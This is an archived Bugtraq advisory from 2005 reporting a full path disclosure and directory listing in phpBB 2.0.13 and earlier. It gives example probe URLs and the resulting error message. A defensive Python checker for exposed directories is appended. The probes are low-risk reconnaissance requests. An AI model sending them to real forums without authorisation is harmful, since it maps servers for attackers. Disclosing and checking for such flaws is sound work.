Bugtraq mailing list archives
[phpbb <= 2.0.13 full path disclosure & directory listing]
From: JoCaNoR SeCuRiTy TeaM <jocanor () gmail com>
Date: 18 Mar 2005 19:21:17 -0000
[phpbb <= 2.0.13 full path disclosure & directory listing]

Author: Jocanor
Date= 18-03-2k5

1. -----------introduction--------

phpbb is a highly customizable bulletin board written in php.
Official page: http://www.phpbb.com

1. ------------Full path disclosure------------

This error is non critical...but you can get the full path to the forum in the system.

exploit:
http://www.example.com/db/oracle.php

Fatal error: Cannot redeclare sql_nextid() in /www/phpbb2/db/oracle.php on line 405

2.---------Directory listing---------

default installation of phpbb has some directories with no index.* file, with this low risk bug you can obtain information of the system, like http daemon.

exploits:
http://www.example.com/images/smiles/
http://www.example.com/templates/subSilver/images/lang_english/
http://www.example.com/docs/

3-----greetz--------

/dev/null

4----- Contact -----

Author: Jocanor
Location: Spain
Email: jocanor [at] gmail [dot] com

JoCaNoR SeCuRiTy ReaSoNS
EOF.
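For administrators checking their own installation for the directory-listing condition reported above, here is an added example that is not part of the original post and not phpBB code: it walks a local copy of the forum's web root and reports directories that have no index.* file and no `.htaccess` turning listings off. It assumes Apache with `.htaccess` honoured and only looks for an `Options -Indexes` line in the directory or its ancestors; the function names and the sample tree are constructed for illustration.

```python
import os
import re
import tempfile

# Apache "Options" line that turns autoindex off (assumes Apache with .htaccess honoured).
NO_INDEXES = re.compile(r"^\s*Options\b.*(?<!\S)-Indexes\b", re.I | re.M)


def listing_disabled(path, root):
    """True if .htaccess in path or an ancestor (up to root) sets Options -Indexes."""
    path, root = os.path.abspath(path), os.path.abspath(root)
    while True:
        ht = os.path.join(path, ".htaccess")
        if os.path.isfile(ht):
            with open(ht, encoding="utf-8", errors="replace") as fh:
                if NO_INDEXES.search(fh.read()):
                    return True
        if path == root:
            return False
        path = os.path.dirname(path)


def find_listable_dirs(root):
    """Relative paths of directories with no index.* file and autoindex not disabled."""
    exposed = []
    for dirpath, _dirs, files in os.walk(root):
        has_index = any(f.lower().startswith("index.") for f in files)
        if not has_index and not listing_disabled(dirpath, root):
            exposed.append(os.path.relpath(dirpath, root).replace(os.sep, "/"))
    return sorted(exposed)


def build_sample_tree(root):
    """Constructed sample layout reusing the directory names from the advisory."""
    for rel in ("images/smiles", "templates/subSilver/images/lang_english", "docs", "db"):
        os.makedirs(os.path.join(root, rel))
    open(os.path.join(root, "index.php"), "w").close()
    open(os.path.join(root, "db", "index.htm"), "w").close()
    with open(os.path.join(root, "docs", ".htaccess"), "w") as fh:
        fh.write("Options -Indexes\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for d in find_listable_dirs(tmp):
            print("no index.* file, listing not disabled:", d)
```

Server-wide configuration is not visible to this check, so a reported directory is a candidate to confirm against the server's autoindex setting.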